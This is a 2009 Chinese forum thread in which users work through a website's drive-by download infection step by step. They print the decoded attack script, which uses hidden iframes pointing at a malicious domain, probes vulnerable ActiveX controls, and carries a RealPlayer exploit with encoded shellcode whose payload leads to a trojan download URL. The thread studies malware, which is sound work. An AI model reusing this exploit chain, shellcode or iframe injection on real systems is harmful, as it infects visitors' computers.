[解密悬赏][第17期][完成]

雨宫优子

包子似乎没见过在这个区发帖..
另外还想起来一个运行方式就是用cmd /c运行

qianwenxiang

先第一步。。here..

原帖由 aarwwefdds 于 2009-1-23 20:17 发表
包子似乎没见过在这个区发帖..
另外还想起来一个运行方式就是用cmd /c运行

刚才朦胧中貌似见到一堆变量组成的 "open"什么的............

貌似挂马已经被清除了

雨宫优子

原帖由 拍黄瓜 于 2009-1-23 20:23 发表
貌似挂马已经被清除了
448717

没清除呢，要清除IE缓存及COOKIE才能再次发现..


必要时还得换个IP...

刚进去忘记清除了

第一步




第二步

<br>
<br>
<br>
<iframe src=http://www.709sese.cn/a123/fxx.htm width=100 height=0></Iframe>
<br>
<br>
<br>
<br>
<br>
<br>
<br>

<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/857114/ystat.js"></script>
<br>

第三部
解出

<Script>
document.write("<Iframe width=100 height=0 src=fx.htm></iframe>");
document.write("");var ssdfs="d";
document.write("<Iframe width=100 height=0 src=../a1/ss.htm></iframe>");
window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<Iframe width=100 height=0 src=../a1/Ms06014.htm></iframe>");
try{var m;
var hw=new ActiveXObject("Downloader.DLoader.1");}
catch(m){};
finally{if(m!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a1/sina.htm></iframe>");}}
try{var n;var qxxxxx="dxac";var qxaaxx="aaaac";var povjudgqjx="fsdfvjjt";
var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
catch(n){};                     
finally{if(n!="[object Error]"){document.write("Downloader.DLoader.1");
document.write("<Iframe width=100 height=0 src=../a1/no.htm></iframe>");}}var ddddddddd="dddddddddds";
try{var b;
var ml=new ActiveXObject("MPS.StormPlayer");}
catch(b){};                     
finally{if(b!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a1/bfyy.htm></iframe>");}}var sdddd="x";var sdddd="x";
try{var f;
var gw=new ActiveXObject("GLIEDown.IEDown.1");}
catch(f){};                     
finally{var dxl="x";if(f!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a1/GLWORLD.html></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="6.0.14.552"){var ammc="dsvb";
document.write('<iframe style=display:none src="../a1/real.htm"></iframe>');}
else
document.write('<iframe style=display:none src="../a1/real.hTml"></iframe>');
}
test();
document.write("");document.write("");document.write("");document.write("");var fjd="fdsfsd";abc="dfdae";document.write("");var fkav="BS";var fkasaccv="BS";var fkaqfccv="BS";var fkaqjfccv="BS";var bccv="BS";
</script>

第四步
解hxxp://www.709sese.cn/a1/glworld.html

<script language=JavaScript>];toLowerCase]();msie 6)==-1&&user.indexOf(msie 7)==-1)return ;nt 5.)==-1)return ;IaaaEaaaRPaaaCaaataaal.IEaaaRaaaPCaaataaal.1;ActiveXObject](RealplayerObj[replace](/a/g,))PRODUCT;VERSION;chilam;6.0.14.544;PlayerProperty](CuteRealVersions);;;if(RealVersion.indexOf(6.0.14.)==-1){zh-cn)ret=unescape(addr[1]);en-us)ret=unescape(addr[2]);6.0.14.550)ret=unescape(addr[4]);6.0.14.552)ret=unescape(addr[5]);6.0.14.543)ret=unescape(addr[6]);6.0.14.536)ret=unescape(addr[7]);6.0.10.)!=-1){6.0.11.)!=-1){6.0.12.)!=-1){var dadong=mybr;6.0.14.)!=-1){Fucking AntiVirus;qwfgsg=LLLL\%XXXXLD;Ball=Qqs;ShellCode=;ShellCode=ShellCode+TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI;ShellCode=ShellCode+xkR0qJPJP3YY0fNYwLEQk0p47zpfKRKJJKVe9xJKYoIoYolOoCQv;ShellCode=ShellCode+3VsVwLuRKwRvavbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEB;ShellCode=ShellCode+sHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGO;ShellCode=ShellCode+NuKpTRrNWOVYM5mqqrwSMTnoeoty08JMnKJMgPw2pey5MgMWQuMw;ShellCode=ShellCode+runOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCX;ShellCode=ShellCode+HmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQK;ShellCode=ShellCode+e6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI;ShellCode=ShellCode+5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQ;ShellCode=ShellCode+OjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWL;ShellCode=ShellCode+gOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5;ShellCode=ShellCode+PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcEN;ShellCode=ShellCode+eStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw;ShellCode=ShellCode+2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwW;ShellCode=ShellCode+qvRHptd4RPFZVOdoSTTnrOSYPx0k3QVN2CPobMtopnPerWvO0aTqFNPcT3Psopwp;C2=;xcbfcxn=sdfdgdfg+qwfgsg+ShellCode;temp=0x8000;while(xcbfcxn.length<temp)xcbfcxn+=lizhen;var arr1=[c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\chimes.wavc:\\Program Files\\NetMeeting\\TestSnd.wavC:\\WINDOWS\\system32\\BuzzingBee.wavC:\\WINDOWS\\clock.avic:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\tada.wavC:\\WINDOWS\\system32\\LoopyMusic.wav];Gamttt_Anhey_Real_Exp_Send[import](arr1[Math.floor(Math[random]()*6)],xcbfcxn,123456456,0,0)

ShellCode解码
alpha2解密。hxxp://d.oixka.com/new/a1.css
最后得出

hxxp://d.oixka.com/new/a1.css为木马

第五步未知


感谢各位耐心指导 = =

[ 本帖最后由 拍黄瓜 于 2009-1-23 20:37 编辑 ]

lichun005

能够找出http://www.709sese.cn已经很解决马了
这网址已经再瑞星病毒检测网排第一位置了。

250662772

用浏览器能看到，工具都看不到，包括那个神器

雨宫优子

似乎有两种方式可以看到挂马页


第一种是万能法，不过对付这个万能法似乎比较麻烦


第二种是用那个网页源文件查看分析器，用这个有安全用法和危险用法两种，随便用哪种..


安全用法稍微繁琐，把拦截框架打上勾，先打开那个主页，然后出来一堆的拦截框架，把这些复制好，再一个个去试..
危险用法就是不打上钩，然后直接打开，比较容易..所有代码一览无余..哪个挂了马就很清楚了
不过也会使你卡很久..